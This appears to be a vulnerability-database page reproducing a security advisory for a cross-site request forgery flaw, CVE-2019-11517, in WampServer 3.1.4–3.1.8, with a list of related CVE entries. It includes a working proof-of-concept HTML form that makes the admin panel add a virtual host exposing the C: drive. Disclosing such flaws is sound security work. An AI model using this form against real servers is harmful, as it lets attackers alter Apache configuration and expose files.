Lucene search

K

Wampserver 3.1.8 Cross Site Request Forgery

🗓️ 10 Jun 2019 00:00:00Reported by Imre RadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 277 Views

WampServer 3.1.8 Cross Site Request Forgery allows attackers to manipulate Apache configuration

Show more
Related
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2018-8817
25 Mar 201819:00
cvelist
Cvelist
CVE-2019-11517
10 Jun 201917:47
cvelist
CVE
CVE-2018-8817
25 Mar 201819:29
cve
CVE
CVE-2019-11517
10 Jun 201918:29
cve
NVD
CVE-2018-8817
25 Mar 201819:29
nvd
NVD
CVE-2019-11517
10 Jun 201918:29
nvd
Packet Storm
WampServer 3.1.2 Cross Site Request Forgery
2 Apr 201800:00
packetstorm
OpenVAS
WampServer < 3.1.3 CSRF Vulnerability
27 Mar 201800:00
openvas
OpenVAS
WampServer >= 3.1.3, <= 3.1.8 CSRF Vulnerability
11 Jun 201900:00
openvas
exploitpack
WampServer 3.1.2 - Cross-Site Request Forgery
2 Apr 201800:00
exploitpack
Rows per page
`Affected product:  
WampServer 3.1.4-3.1.8  
  
Offiical description:  
"WampServer is a Windows web development environment. It allows you to  
create web applications with Apache2, PHP and a MySQL database.  
Alongside, PhpMyAdmin allows you to manage easily your databases."  
  
Official website:  
http://www.wampserver.com/en/  
  
Vulnerability description:  
The add_vhost.php script in the administration panel of Wampserver was  
vulnerable to Cross Site Request Forgery (CVE-2018-8817 -  
https://www.exploit-db.com/exploits/44385) in WampServer 3.1.2 and  
below.  
The synchronizer pattern added as remediation was not implemented  
properly, so that WampServer 3.1.3 - 3.1.8 were still vulnerable to  
CSRF; attackers could abuse this flaw to get new vhosts added or  
existing ones deleted in the Apache configuration file.  
Technical requirement of successful exploitation is that the admin has  
not opened the add_vhost.php file in the current browser serssion yet  
(so the random tokens are not initialized).  
  
Proof of concept form to expose drive c:\:  
  
<form name="csrfWamp" method="post"  
action="http://localhost/add_vhost.php?lang=english">  
<input type="text" name="vh_name" value="whatever.com">  
<textarea type="text" name="vh_folder">c:///</textarea>  
<input type="hidden" name="checkadd" value="">  
<input type="submit" name="submit" value="Start!">  
</form>  
  
Fixed WampServer version:  
3.1.9  
  
Official changelog:  
http://forum.wampserver.com/read.php?2,138295,155552#msg-155552  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo